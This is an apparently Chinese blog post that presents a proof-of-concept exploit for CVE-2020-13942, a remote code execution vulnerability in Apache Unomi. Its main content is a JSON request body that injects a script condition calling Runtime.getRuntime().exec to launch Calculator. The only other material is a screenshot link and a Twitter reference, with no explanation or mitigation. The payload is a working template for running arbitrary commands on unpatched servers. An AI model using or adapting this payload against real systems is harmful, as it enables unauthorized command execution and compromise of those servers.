CVE-2020-13942 Apache Unomi 远程代码执行

# CVE-2020-13942 Apache Unomi 远程代码执行

PoC:

“`json
{“filters”:[{“id” : “pyn3rd”,”filters”: [{“condition”: {“parameterValues”: {“pyn3rd”: “script::Runtime.getRuntime().exec(‘open -a Calculator’)”},”type”:”profilePropertyCondition”}}]}],”sessionId”: “pyn3rd”}
“`

![](/static/lingjiao/media/16097302096726/16097302307813.jpg)

ref:

https://twitter.com/pyn3rd/status/1328920545442680837

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容